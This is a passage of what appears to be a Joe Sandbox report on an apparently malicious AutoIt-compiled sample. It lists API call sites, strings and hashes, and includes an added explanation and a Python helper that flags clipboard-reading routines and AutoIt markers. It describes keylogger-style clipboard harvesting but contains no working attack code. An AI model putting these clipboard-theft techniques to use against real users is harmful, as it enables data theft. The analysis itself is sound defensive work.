                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                      • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                      • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-517079104
                                                                      • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                      • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                      • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                      • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 1038674560-3360698832
                                                                      • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                      • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                      • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                                                                      • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                      APIs
                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                      • SetCursor.USER32(00000000), ref: 0043075B
                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                      • SetCursor.USER32(00000000), ref: 00430773
                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                      • SetCursor.USER32(00000000), ref: 0043078B
                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                      • SetCursor.USER32(00000000), ref: 004307A3
                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                      • SetCursor.USER32(00000000), ref: 004307BB
                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                      • SetCursor.USER32(00000000), ref: 004307D3
                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                      • SetCursor.USER32(00000000), ref: 004307EB
                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                      • SetCursor.USER32(00000000), ref: 00430803
                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                      • SetCursor.USER32(00000000), ref: 0043081B
                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                      • SetCursor.USER32(00000000), ref: 00430833
                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                      • SetCursor.USER32(00000000), ref: 0043084B
                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                      • SetCursor.USER32(00000000), ref: 00430863
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                      • SetCursor.USER32(00000000), ref: 0043087B
                                                                      • SetCursor.USER32(00000000), ref: 00430887
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                      • SetCursor.USER32(00000000), ref: 0043089F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$Load
                                                                      • String ID:
                                                                      • API String ID: 1675784387-0
                                                                      • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                      • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                      • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                      • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                      APIs
                                                                      • GetSysColor.USER32(0000000E), ref: 00430913
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                      • GetSysColor.USER32(00000012), ref: 00430933
                                                                      • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                      • GetSysColor.USER32(0000000F), ref: 00430959
                                                                      • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                      • GetSysColor.USER32(00000011), ref: 00430979
                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                      • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                      • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                      • SelectObject.GDI32(?,?), ref: 004309B4
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                      • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                      • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                      • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                      • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                      • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                      • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                      • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                      • DeleteObject.GDI32(?), ref: 00430AE9
                                                                      • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                      • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 1582027408-0
                                                                      • Opcode ID: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                                      • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                      • Opcode Fuzzy Hash: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                                                                      • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                      APIs
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CloseConnectCreateRegistry
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 3217815495-966354055
                                                                      • Opcode ID: 7d529682ee5fc17807d9f1869fe525bc37d3a13623003215e7c5094f22c59936
                                                                      • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                      • Opcode Fuzzy Hash: 7d529682ee5fc17807d9f1869fe525bc37d3a13623003215e7c5094f22c59936
                                                                      • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 004566AE
                                                                      • GetDesktopWindow.USER32 ref: 004566C3
                                                                      • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                      • DestroyWindow.USER32(?), ref: 00456746
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                      • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                      • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                      • IsWindowVisible.USER32(?), ref: 0045682C
                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                      • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                      • GetWindowRect.USER32(?,?), ref: 00456873
                                                                      • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                      • CopyRect.USER32(?,?), ref: 004568BE
                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                      • String ID: ($,$tooltips_class32
                                                                      • API String ID: 225202481-3320066284
                                                                      • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                      • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                      • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                      • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                      APIs
                                                                      • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                      • CloseClipboard.USER32 ref: 0046DD0D
                                                                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                      • CloseClipboard.USER32 ref: 0046DD41
                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                      • CloseClipboard.USER32 ref: 0046DD99
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                      • String ID:
                                                                      • API String ID: 15083398-0
                                                                      • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                      • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                      • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                      • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                      APIs
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                      • GetClientRect.USER32(?,?), ref: 00471D05
                                                                      • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                      • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                      • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                      • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                      • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                      • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                      • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                      • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                      • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                      • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                      • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                      • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                      • String ID: @$AutoIt v3 GUI
                                                                      • API String ID: 867697134-3359773793
                                                                      • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                      • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                      • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                      • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
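Two of the routines above are worth pulling out of the raw listing. The function at 0046DCE7 is the clipboard reader behind the "Contains functionality for read data from the clipboard" signature: it opens the clipboard, asks for format 0000000D (CF_UNICODETEXT) and falls back to format 00000001 (CF_TEXT), fetching each with GetClipboardData and locking the handle with GlobalLock. The function at 00471CF7 creates a window of class "AutoIt v3 GUI", and the routine at the top of this section compares input against #NoAutoIt3Execute, #OnAutoItStartRegister and the other AutoIt script directives; those are AutoIt3 runtime strings, so these routines are the embedded interpreter rather than the keylogger payload itself. The script below is an added triage helper, not part of the Joe Sandbox report or of any tool it references: it parses API bullet lines in the report's own format, flags a clipboard read when OpenClipboard is present alongside GetClipboardData and names the formats requested, and scans for the AutoIt markers. The CF_TEXT/CF_UNICODETEXT values are the standard winuser.h constants; the sample input is an excerpt copied from the listings above. Note that the listing is a set of static cross-references in address order, not an execution trace, so the CloseClipboard at 0046DD0D (an early-exit path) must not be treated as closing the clipboard before the second GetClipboardData.

```python
"""Triage helper for Joe Sandbox style API listings (added example).

Parses "• Api.MODULE(args), ref: ADDR" bullet lines, reports which clipboard
formats a routine fetches, and looks for AutoIt3 runtime markers.
"""
import re
from dataclasses import dataclass

# Constructed sample: lines copied from the report's listings for the
# clipboard reader at 0046DCE7 and the GUI routine at 00471CF7.
SAMPLE_REPORT = """\
• OpenClipboard.USER32(?), ref: 0046DCE7
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
• GetClipboardData.USER32(0000000D), ref: 0046DD01
• CloseClipboard.USER32 ref: 0046DD0D
• GlobalLock.KERNEL32(00000000), ref: 0046DD37
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
• GetClipboardData.USER32(00000001), ref: 0046DD8D
• CloseClipboard.USER32 ref: 0046DD99
• CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
• String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#include$#requireadmin$Cannot parse #include
"""

# Standard clipboard format constants from winuser.h.
CLIPBOARD_FORMATS = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}

# Strings emitted by the AutoIt3 runtime (window class and script directives).
AUTOIT_MARKERS = ("AutoIt v3 GUI", "#NoAutoIt3Execute", "#OnAutoItStartRegister")

# One API bullet: name.MODULE, an optional "(args)" list, then ", ref: ADDR".
# Lines such as "Part of subcall function ..." or "String ID: ..." do not match.
API_LINE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)",
    re.MULTILINE,
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple   # raw argument strings; "?" means the sandbox could not resolve it
    ref: int      # address of the call site


def parse_api_calls(report: str) -> list:
    """Extract every resolved API call from the bullet listing, in listing order."""
    calls = []
    for m in API_LINE.finditer(report):
        raw = m.group("args") or ""
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def _as_int(arg: str):
    """Hex argument to int; None for unresolved '?' placeholders."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def clipboard_formats_read(calls) -> list:
    """Names of the clipboard formats fetched with GetClipboardData.

    Requires OpenClipboard somewhere in the same routine. Order is not a
    trace (the listing is address-ordered xrefs), so an intervening
    CloseClipboard on an error path does not end the window of interest.
    """
    if not any(c.name == "OpenClipboard" for c in calls):
        return []
    formats = []
    for c in calls:
        if c.name == "GetClipboardData" and c.args:
            fmt = _as_int(c.args[0])
            label = CLIPBOARD_FORMATS.get(fmt, f"unknown({c.args[0]})")
            if label not in formats:
                formats.append(label)
    return formats


def autoit_markers(report: str) -> list:
    """AutoIt3 runtime strings present anywhere in the listing text."""
    return [m for m in AUTOIT_MARKERS if m in report]


def triage(report: str) -> dict:
    """Summarise one routine's listing for quick review."""
    calls = parse_api_calls(report)
    formats = clipboard_formats_read(calls)
    markers = autoit_markers(report)
    return {
        "api_calls": len(calls),
        "clipboard_formats": formats,
        "clipboard_harvest": bool(formats),
        "autoit_markers": markers,
        "autoit_runtime": bool(markers),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_REPORT).items():
        print(f"{key}: {value}")
```

Run against the excerpt, the helper reports both CF_UNICODETEXT and CF_TEXT being fetched and all three AutoIt markers present; feeding it the other listings in this section (the cursor, GDI and registry routines) yields no clipboard hit, which is the expected negative.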
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 1503153545-1459072770
                                                                      • Opcode ID: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                                                                      • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                      • Opcode Fuzzy Hash: 317b836bd45d303022c8cfe41fd482541af156a870e12d87d8544c7d52709fdd
                                                                      • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
